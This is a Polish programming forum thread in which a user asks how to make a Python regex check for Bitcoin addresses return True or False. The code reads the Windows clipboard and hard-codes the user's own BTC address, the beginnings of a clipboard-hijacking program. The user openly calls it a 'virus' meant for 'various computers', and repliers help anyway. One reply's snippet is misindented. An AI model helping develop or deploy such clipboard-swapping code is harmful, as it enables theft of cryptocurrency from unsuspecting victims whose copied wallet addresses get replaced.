Szukanie adresu Bitcoin za pomocą "re.match".

0

Witam, jak napisałem w temacie mam problem z znalezieniem adresu Bitcoin.
Oto mój kod:

import re
import win32clipboard

btc_address = b'1HU6Fr4mzw2TtjJaAGt75YkAhnb5gDgZFL'

def main():
    win32clipboard.OpenClipboard()
    data = win32clipboard.GetClipboardData()
    win32clipboard.CloseClipboard()

    if len(data) > 33:
        data = re.match('^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$', data)

        print(data)

if __name__ == '__main__':
    main()

Ten kod zwraca mi:

<re.Match object; span=(0, 34), match='1HB5XMLmzFVj8ALj6mfBsbifRoD4miY36v'>

lub gdy nie mam adresu btc:

None

A chciałbym mieć zwracane True lub False

Z góry dzięki.

2

Napisz sobie po tym print warunek if data i zamapuj.

(...)
def main():
    (...)
    if len(data) > 33:
        data = re.match('^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$', data)

        print(data)
        if data:
            return True
         return False

if __name__ == '__main__':
    main()
0

Myślałem że sobie darowałeś tego wirusa :D

Tak sprawdzasz dane regexem

import re

#...
data = '1HU6Fr4mzw2TtjJaAGt75YkAhnb5gDgZFL'
result = re.match('^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$', data);

if result:
    print("Adress does match ({})".format(data))
else:
	print("Address does not match")
#....
0

Dzięki :D

BTW. To ten stary "wirus" to był zakład a ten to będzie na różnych kompach :D

0

Proszę o zamnknięcie tematu.

1

Tematu nie trzeba zamykac. Przy odpowiedzi masz takie "zaakceptuj" i to oznacza temat jako rozwiazany

0
stivens napisał(a):

Tematu nie trzeba zamykac. Przy odpowiedzi masz takie "zaakceptuj" i to oznacza temat jako rozwiazany

No i to mam kliknięte

1 użytkowników online, w tym zalogowanych: 0, gości: 1